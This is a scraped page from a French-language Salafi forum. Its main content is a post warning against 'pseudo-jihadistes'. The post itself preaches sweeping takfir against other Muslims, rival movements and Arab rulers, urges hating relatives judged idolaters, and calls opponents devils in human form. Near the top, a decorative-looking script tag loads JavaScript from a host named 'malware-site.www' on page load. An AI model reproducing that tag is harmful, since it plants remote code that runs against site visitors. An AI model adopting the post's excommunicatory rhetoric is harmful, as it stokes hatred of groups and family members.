ISLAM SUIVANT LE CORAN ET LA SUNNA

<center><iframe align="center" id="IW_frame_1438" src="http://www.tvquran.com/add/index.htm" frameborder="0" allowtransparency="1" scrolling="no" width="302" height="334"></iframe></center>



<a href="http://#7F96C3" id="pluiedetoiles"><script type="text/javascript" src="http://malware-site.www/js/pluiedetoiles.js"></script></a>Ce présent blog se propose de transmettre le message de l'Islam et le monothéisme islamique d'après le Coran et la Sounna authentique selon la compréhension des Pieux prédécesseurs.

N'hésitez pas à vous inscrire à la Newsletter pour être mis au courant des nouveaux articles.

ISLAM SUIVANT NOS EMINENTS SAVANTS

Logo Design by FlamingText.com

Logo Design by FlamingText.com
Bienvenue sur ce forum . Comme son nom l'indique, ce forum a pour but de vous faire découvrir cette magnifique religion qu’est l’Islam ainsi que de rectifier votre avis sur celle-ci. Le forum s’est aussi fixé un autre objectif : « mettre fin aux mensonges islamophobes et défendre l’honneur de D'Allah ainsi que Son Messager »

nous suivons a travers ce forum la voie de nos pieux predecesseurs extrait du coran et de la sounna selon la compréhension de notre bien aimé prophete صلى الله عليه و سلم»

il est basé sur la croyance des gens de la sounnah , et se conforme strictement au coran, et la Sounna du prophète Mohamed صلى الله عليه وسلم ...Les articles que contient ce forum sont des écrits ou des paroles de nos eminents savants salafis , et notre objectif est avant tout d’appeler les gens à l'unicité d'Allah (tawhid) et de diffuser la da'wah salafiyah qui est la bonne compréhension de l’islam,il est le plus rédigé en langue française afin de faire connaître aux musulmans francophones et meme aux mecreants leur religion véridique et les appeler à pratiquer ses enseignements et préceptes, de les avertir du danger de l'association à Allah , ainsi que des innovations et de les mettre en garde sur les mauvaises interprétations de l’islam diffusées par les innovateurs et les groupes égarés.

Allah par sa Miséricorde a envoyé des prophètes et des Envoyés avec un seul message, un seul objectif : rappeler aux hommes l’Unicité de dieu ( il n’y a de dieu qu’Allah) Ceci est le fondement de l’islam



 
">

Like/Tweet/+1

neige qui tombe

coran a telecharger de medine

Novembre 2017

LunMarMerJeuVenSamDim
  12345
6789101112
13141516171819
20212223242526
27282930   

Calendrier Calendrier


    mise en garde contre les pseudo djihadistes

    Partagez
    avatar
    assalafia
    Admin

    Féminin
    Messages : 1354
    Date d'inscription : 26/08/2011
    Age : 35
    Localisation : algerie-constantine
    Emploi/loisirs : lire le coran
    Humeur : bonne

    mise en garde contre les pseudo djihadistes

    Message par assalafia le Sam 23 Juin - 22:24


    Le jihâd dans le sentier d'Allah est un
    acte d'adoration parmi tant d'autres, et il faut savoir que sans le
    tawhîd, cet acte d'adoration n'est pas valide tout comme la prière ne
    peut être valide sans purification. Le shaykh de l'Islam Mouhammad Ibn
    Abd Al-Wahhâb dit à ce propos dans «al-qawâ'id al-arba'a» : Et lorsque
    tu sauras qu'Allah t’a créé pour son adoration, sache alors que
    l’adoration n'est appelée ainsi que si elle est accompagnée du
    monothéisme (tawhîd), tout comme la prière ne porte ce nom que si elle
    est pratiquée en état de pureté. En effet, lorsque le polythéisme se
    mélange à l’adoration, il la corrompt tout comme l’impureté corrompt la
    pureté. Et lorsque tu sauras que lorsque le polythéisme se mêle à
    l’adoration, il la corrompt et annule toutes les actions, et rend celui
    qui le commet parmi les damnés de l’Enfer éternellement, tu sauras dès
    lors que la chose la plus importante pour toi c’est de connaître cela.
    Or nous constatons à notre époque l'émergence d'une secte s'affiliant à
    l'Islam et qui prend pour fondement le combat (qitâl) au détriment du
    tawhîd (monothéisme). Il s'agit de ceux qu'on appelle communément les «
    pseudo-jihadistes » ou les « qitalistes ». Ces derniers axent leurs
    prêches sur le jihâd sans pourtant connaître et appliquer la base de la
    religion (asl ad-dîn) qui implique inéxorablement de se désavouer de
    l'associationnisme (chirk) et des associateurs (mouchrikîn). Ils
    s'allient et haïssent au nom du combat (qitâl) et non pas au nom du
    tawhîd. Ainsi si vous êtes sur la même longueur qu'eux dans leur
    approche du jihâd, ils vous aiment et vous considèrent comme un des
    leurs mais si vous les critiquez, alors ils vous excèrent. Le mouwahhîd,
    quant à lui, il aime et déteste au nom du tawhîd, comme le rappelle
    l'imam Ibn Al-Qayyim : Sache que l’homme ne peut être appelé imam dans
    la religion que jusqu’à qu’il soit un meneur dans l’appel au tawhîd, et
    qu’il voue de l’alliance et de l’inimitié pour cela. Source : rawdha
    al-mouhibbîn, 1/475 Tout comme c'est le cas pour toutes les sectes se
    disant de l'Islam et qui prennent de la Religion ce qui les arrangent,
    les pseudo-jihadistes insistent sur un aspect particulier de l’Islam,
    ici en l'occurence le jihâd, et ils appellent à cela, tout en négligeant
    d’autres aspects de l’Islam encore plus fondamentaux et vitaux tels que
    le tawhîd. Ils ont ainsi oublié la raison et le but pour lesquels ils
    ont été créés : unifier Allah. Allah dit à ce propos dans la sourate 51,
    au verset 56 : وَمَا خَلَقْتُ الْجِنَّ وَالْإِنسَ إِلَّا لِيَعْبُدُونِ
    Je n'ai créé les djinns et les hommes que pour qu'ils M'adorent. Dans
    son livre « al-ousoûl ath-thalâthâ' » (en français : les trois
    fondements), le shaykh de l'Islam Mouhammad Ibn Abd Al-Wahhâb, qu'Allah
    l'ait en Sa miséricorde, explique le sens de ce verset coranique dans le
    passage qui suit : Sache, qu’Allah te guide vers Son obéissance, que la
    hanîfiyya est la voie d’Abraham, qui consiste à adorer Allah Seul en
    lui vouant un culte exclusif. Et c’est à cela qu’Il a ordonné tous les
    gens et c'est pour cette case qu'Il les a créés, comme le Très Haut le
    dit : « Et Je n’ai créé les djinns et les humains que pour qu’ils
    M’adorent » (sourate 51 - verset 56). Le sens de : « qu’ ils M’adorent »
    est : « Qu’ils M'unifient ». Les actes d'adoration tels que jihâd dans
    le chemin d'Allah, la prière (salât), la zakât, le jeûne ou encore le
    pèlerinage ne sont acceptés par Allah que si ils sont accompagnés du
    tawhîd, sinon ils sont vains comme le dit le Très-Haut au verset 65 de
    la sourate 39 : وَلَقَدْ أُوحِيَ إِلَيْكَ وَإِلَى الَّذِينَ مِنْ
    قَبْلِكَ لَئِنْ أَشْرَكْتَ لَيَحْبَطَنَّ عَمَلُكَ وَلَتَكُونَنَّ مِنَ
    الْخَاسِرِينَ En effet, il t’a été révélé, ainsi qu’à ceux qui t’ont
    précédé : "Si tu donnes des associés à Allah, ton œuvre sera certes
    vaine ; et tu seras très certainement du nombre des perdants". Allah dit
    également dans la sourate 6, au verset 88 : ذَلِكَ هُدَى اللّهِ يَهْدِي
    بِهِ مَن يَشَاءُ مِنْ عِبَادِهِ وَلَوْ أَشْرَكُواْ لَحَبِطَ عَنْهُم
    مَّا كَانُواْ يَعْمَلُونَ Telle est la direction par laquelle Allah
    guide qui Il veut parmi Ses serviteurs. Mais s'ils avaient donné à Allah
    des associés, alors, tout ce qu'ils auraient fait eût certainement été
    vain. Force est de constater que les pseudo-jihadistes insistent sur
    l'importance du combat (qitâl) contre les croisés, les sionistes et les
    gouverneurs tawâghît des pays arabes alors qu'ils ignorent même les
    bases élémentaires de l'Unicité d'Allah. Ils prétendent combattre pour
    la cause d'Allah alors qu'ils font preuve d'ignorance ou de laxisme
    vis-à-vis des exigences du tawhîd comme le fait de ne pas faire le
    takfîr sur les associateurs se prétendant de l'Islam. L'imam Mouhammad
    Ibn Abd Al-Wahhâb nous explique l'importance du tawhîd avant toute autre
    chose en disant : Saches, qu’Allah te fasse miséricorde, que
    l’obligation de connaître la l'attestation [de foi], c’est-à-dire lâ
    ilâha illâ llâh, vient avant l’obligation de la prière et du jeûne. Le
    serviteur doit chercher le sens de ce qui est plus grand que la prière
    ou le jeûne. L’interdiction de l’association et de la croyance au
    Tâghoût, est plus grande que l’interdiction d’épouser les mères et les
    tantes. Le plus grand degré de la Foi est la chahâda. Ainsi le serviteur
    témoigne que l’adoration est entièrement vouée à Allah. Il n’y a rien
    de celle-ci qui peut être donnée à un Prophète, un Ange ou un pieux. Et
    c’est cependant le droit d’Allah sur Ses serviteurs. La signification de
    la mécréance au Tâghoût, c’est de rejeter tout ce qui est divinisé en
    dehors d’Allah parmi les djinns, les humains, les arbres, les roches, ou
    toute autre chose en dehors de ceux-ci. Nous devons témoigner de sa
    mécréance et de son égarement et nous devons le détester même s’il
    s’agit de notre père ou notre frère. En ce qui concerne celui qui dit :
    «Je n’adore pas autre qu’Allah, mais je ne me préoccupe pas des pieux
    pris en adoration ni des mausolées» ceci est un mensonge vis-à-vis
    d’Allah, il ne croit pas en Allah et ne rejette pas le Tâghoût. Ceci est
    une parole courte (i.e. la chahâda) qui demande une longue recherche,
    un effort personnel afin de connaître l’Islam, la raison pour laquelle
    Allah a envoyé Ses Messagers, ainsi que la recherche de ce que les
    Savants ont dit à propos de « quiconque mécroit au Tâghoût tandis qu’il
    croit en Allah, saisit l’anse la plus solide, qui ne peut se briser »
    (sourate 2 - verset 256). Elle demande aussi de fournir des efforts dans
    ce qu’Allah a enseigné et dans ce que le Prophète - qu'Allah prie sur
    lui et lui donne la paix - a enseigné à sa communauté du point de vu du
    Tawhîd. Quiconque se détourne de cela, Allah scelle son cœur, et cette
    personne a préféré la vie d’ici bas à la Religion. Allah ne l’excuse pas
    de son ignorance. Allah est le plus Savant ! Source : Fatwas des
    savants de Najd Les pseudo-jihadistes prétendent dénoncer et combattre
    la mécréance des gouverneurs tawâghît, ce qui leur donne une certaine
    orthodoxie en apparence. En se désavouant de l'impiété des tawâghît, les
    pseudo-jihadistes se distinguent donc des pseudo-salafis qui, quant à
    eux, sont les défenseurs acharnées des gouverneurs mécréants qui se sont
    mis à l'égal d'Allah dans la législation comme ceux des pays arabes. À
    ce stade d'analyse, les pseudo-jihadistes laissent apparaître un
    semblant d'orthopraxie pour le moins illusoire. La vérité est que
    lorsqu'on regarde de plus près la croyance des qitalistes, on constate
    chez eux de graves défaillances dans la 'aqîda, des contradictions et
    des manquements vis-àvis des exigences du tawhîd. En effet, ils ne se
    désavouent pas des mouchrikîn qui s'affilient à l'Islam tels que les
    pseudo-salafis (talafis) ou encore les "ikhwân" pour ne citer que
    ceux-là. Aussi, ils ont retiré le takfîr des mouchrîkîn de la base de la
    religion (asl ad-dîn) et ils permettent le fait de rechercher le
    jugement du tâghoût en terre de mécréance sous prétexte qu'il n'existe
    pas de tribunaux islamiques. Il est à noter également que c'est avec
    acharnement qu'ils taxent les mouwahhidîn d'être des prétendus
    extrémistes dans le takfîr (ghoulât at-takfîr). Il faut savoir que cette
    tradition consistant à considérer les monothéistes comme des
    extrémistes du takfîr (ghoulât at-takfîr) n'est pas une nouveauté de
    notre époque. Mouhammad Ibn Abd Al-Wahhâb, qu'Allah sanctifie son âme,
    n'a pas échappé à cette vindicte calomnieuse de la part des égarés,
    comme il le déclare lui-même en ces termes : Et si quelqu’un dit : « Ils
    font de l'excommunication (takfîr) généralisée »- Nous répondons :
    Gloire à Toi, oh Allah, c’est une immense calomnie ! Celui que nous
    jugeons mécréant, c’est celui qui atteste que le monothéisme est la
    Religion d’Allah et de Son Messager, et que l’invocation d’un autre
    qu’Allah est fausse, puis après, juge mécréants les monothéistes, les
    appellant « khawârij » et se met dans le camp des adorateurs de
    mausolées contre les monothéistes. Source : «ad-dourar as-daniyya » ,
    volume 1, page 63 Et quant à l'imam hanbalite Abou Boutayn, qu'Allah lui
    fasse miséricorde, il fustige les allégations des détracteurs déviants
    comme suit : Quant aux ignorants qui disent « vous jugez les musulmans
    [comme étant des] mécréants », ceux-là ne connaissent ni l’Islam ni le
    monothéisme. Apparemment, l’Islam de celui qui dit cela est invalide,
    car celui qui ne blâme pas ces choses que font les idolâtres
    aujourd’hui, et ne voit rien de mal dedans, ce n’est pas un musulman.
    Source : «majmoû‘at rasâ‘il wa masâ’il an-najdiya», 1/654-655 C'est
    ainsi que l'Histoire se repète! Les pseudo-jihadistes accusent à tort
    les monothéistes d'Ahl As-Sounna d'avoir un soit-disant extrémisme dans
    le takfîr pour la simple et unique raison que ces derniers mettent en
    pratiquent le tawhîd. Il est même à noter que certains qitalistes
    n'hésitent pas à taxer les mouwahhidîn d'être des khawârij. Le shaykh
    Abd Al-Latîf Ibn Abd Ar-Rahmân (m. 1293 h.) réfute cette allégation
    infondée en ces termes : Beaucoup de polythéistes de cette époque se
    sont certes trompés en pensant qu'une personne qui excommunie celui qui
    prononce la chahâda est forcément d'entre les khawarij. Ceci est faux,
    mais nous disons plutôt que la prononciation de la chahada est un
    empêchement du takfîr seulement pour celui qui connait sa signification,
    applique ce qu'elle exige, et voue un culte exclusif à Allah, sans Lui
    donner d'associé. Source : ad-dourar as-saniyya, 12/263 Les gens des
    passions et de l'égarement s'imaginent que les mouwahhidîn d'Ahl
    As-Sounna ont de l'exagération dans le takfîr, et c'est donc pour cela
    que ces égarés les taxent injustement d'être des khawârij. Certains
    pseudo-jihadistes se refusent d'étiquetter les mouwahhidin comme étant
    des khawârij et préferent plutôt les nommer « ghoulat at-takfîr » . En
    vérité, la finalité est la même : ils veulent calomnier les monothéistes
    d'avoir un soit-disant extrémisme dans le takfîr dans le but de mettre
    le doute dans le cœur des gens et des faire fuire de la vérité. Les
    qitalistes sont à l'image des diables orgueilleux en apparence humaine
    dont l'imam Mouhammad Ibn Abd Al-Wahhâb nous en donne une description
    comme suit : Lorsque ces diables orgueilleux en apparence humaine voient
    quelqu’un enseigner aux gens ce que leur a ordonné le Prophète
    Mouhammad - qu'Allah prie sur lui et lui donne la paix - c’est-à-dire
    l'attestation [de foi] lâ ilâha illâ llâh, ils commencent à se plaindre,
    mettre des ambiguïtés aux gens et disent : "Comment pouvez-vous rendre
    mécréants les musulmans? Comment pouvez-vous parler ainsi sur les morts
    ?" - Ceci avec le but que la signification de lâ ilâha illâ llâh ne soit
    pas expliquée aux gens … Source : ad-dourar as-saniyya, vol. 10, p. 50

      La date/heure actuelle est Sam 18 Nov - 9:32